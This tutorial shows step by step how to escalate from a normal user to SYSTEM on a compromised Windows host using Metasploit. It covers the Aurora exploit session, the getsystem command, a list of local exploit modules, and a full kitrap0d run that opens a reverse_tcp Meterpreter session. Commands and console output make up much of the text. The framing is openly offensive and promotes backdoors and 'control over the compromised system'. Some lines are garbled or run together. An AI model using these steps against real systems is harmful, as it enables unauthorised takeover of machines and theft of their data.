When it comes to client-side exploits, it’s not uncommon to find yourself operating with limited user rights within the compromised system. These restrictions can greatly hinder your ability to carry out crucial actions like password extraction, registry manipulation, or installing backdoors. However, there’s good news — the Metasploit Framework offers a powerful solution in the form of the “getsystem” Meterpreter script.
The “getsystem” script utilizes a range of techniques to attempt to elevate your privileges to the coveted SYSTEM level on the targeted system. This elevated access level grants you unparalleled control and opens up a world of possibilities. With SYSTEM privileges, you gain the ability to execute advanced operations that were previously off-limits.
Additionally, apart from the “getsystem” script, Metasploit provides several other local exploits that can be leveraged to escalate privileges. These exploits are specifically designed to exploit vulnerabilities at the local level, allowing you to escalate your user privileges further.
To demonstrate the significance of privilege escalation, let’s consider the notorious ‘Aurora’ exploit. Upon successfully compromising the system and establishing a Meterpreter session, we find ourselves operating within the confines of a regular user account. This limited access hampers our ability to carry out more extensive actions and underscores the importance of escalating our privileges to gain the desired level of control.
By employing the powerful capabilities of Metasploit and utilizing privilege escalation techniques, we can elevate our access to SYSTEM level privileges. This enables us to unleash the full potential of our exploitation efforts and carry out more sophisticated operations, greatly expanding our impact and control over the compromised system.
Using the infamous ‘Aurora’ exploit, we see that our Meterpreter session is only running as a regular user account.
msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.120
[*] Sending stage (748544 bytes) to 192.168.1.120
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.120:4444) at 2010-08-21 13:39:10 -0600
msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: OLN-XP-RU2-RG\victim
meterpreter >To utilize the powerful “getsystem” command in Metasploit’s Meterpreter, we must ensure that the “priv” extension is loaded. If it’s not already loaded, we can easily load it by following these steps:
By executing this command, we are signaling our intention to employ the “priv” extension, which specializes in handling privilege-related operations.
Once the “priv” extension is successfully loaded, we can proceed with leveraging the “getsystem” command to escalate our privileges within the compromised system. This command employs a variety of techniques to attempt to elevate our user rights to the coveted SYSTEM level.
It’s important to understand the significance of privilege escalation in the context of client-side exploits. By elevating our privileges to SYSTEM level, we effectively gain full control over the targeted system. This elevated access allows us to execute a multitude of advanced operations, ranging from password extraction and registry manipulation to installing persistent backdoors and more.
meterpreter > use priv
Loading extension priv...success.
meterpreter >By running “getsystem” without any additional options, we allow Metasploit to take the reins and handle the heavy lifting for us. The script will systematically attempt every available method until it succeeds, ensuring we achieve the desired SYSTEM-level privileges.
Let’s witness the seamless privilege escalation in action:
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >With this command, Metasploit initiates the privilege escalation process. It diligently tries various techniques, utilizing its arsenal of methods to elevate our user privileges. In a matter of moments, the script finds a successful approach, granting us the coveted SYSTEM-level access we seek.
Now that we have successfully escalated our privileges, we can verify our elevated status: (meterpreter > getuid)
Upon executing the command, we can see that our Meterpreter session now operates under the prestigious NT AUTHORITY\SYSTEM username. This signifies that we have successfully attained the highest level of access on the compromised system.
Local Exploits:
In certain scenarios, the “getsystem” command may encounter obstacles and fail to achieve the desired privilege escalation. When faced with such situations, we can employ an alternative approach by utilizing local exploits available within the Metasploit Framework.
Let’s consider a scenario where the “getsystem” command encounters an “Access is denied” error:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >In this case, we can gracefully background the current session and manually explore additional exploits provided by Metasploit. It’s important to note that the available exploits within Metasploit’s arsenal may evolve over time, so it’s essential to stay updated with the latest additions and changes.
By backgrounding the session, we temporarily set it aside and gain access to the Metasploit console, where we can manually select and utilize different local exploits to continue our privilege escalation efforts. These local exploits are specifically designed to exploit vulnerabilities at the system’s local level, providing an alternative route to elevate our privileges.
eterpreter > background
[*] Backgrounding session 1...
msf exploit(ms10_002_aurora) > use exploit/windows/local/
...snip...
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
...snip...
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_081_track_popup_menu
...snip...
msf exploit(ms10_002_aurora) >Now, let’s explore the usage of the renowned Kitrap0d exploit on our target system. In this example, our target is a vulnerable 32-bit machine, making it an ideal candidate for this specific exploit.
Start by selecting the Kitrap0d exploit within the Metasploit console:
msf exploit(ms10_015_kitrap0d) > use exploit/windows/local/ms10_015_kitrap0dSet the session to the desired Meterpreter session (in this case, session 1):
msf exploit(ms10_015_kitrap0d) > set SESSION 1Configure the payload to be used as “windows/meterpreter/reverse_tcp”:
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcpSpecify the local host (LHOST) and the port (LPORT) to establish the reverse TCP connection
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.120
msf exploit(ms10_015_kitrap0d) > set LPORT 4443Verify the current options before proceeding Verify the current options before proceeding:
msf exploit(ms10_015_kitrap0d) > show optionsExploit the target by executing the following command:
msf exploit(ms10_015_kitrap0d) > exploit
[*] Started reverse handler on 192.168.1.120:4443
[*] Launching notepad to host the exploit...
[+] Process 4048 launched.
[*] Reflectively injecting the exploit DLL into 4048...
[*] Injecting exploit into 4048 ...
[*] Exploit injected. Injecting payload into 4048...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (769024 bytes) to 192.168.1.71
[*] Meterpreter session 2 opened (192.168.1.120:4443 -> 192.168.1.71:49204) at 2014-03-11 11:14:00 -0400Once the exploit completes successfully, a Meterpreter session is established. We can verify our elevated privileges with the following command:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >The output confirms that our current server username is now NT AUTHORITY\SYSTEM, indicating that we have achieved SYSTEM-level privileges on the compromised system.
With the Kitrap0d exploit, we have successfully escalated our privileges and gained complete control over the target system, enabling us to execute advanced operations and further explore the compromised environment.
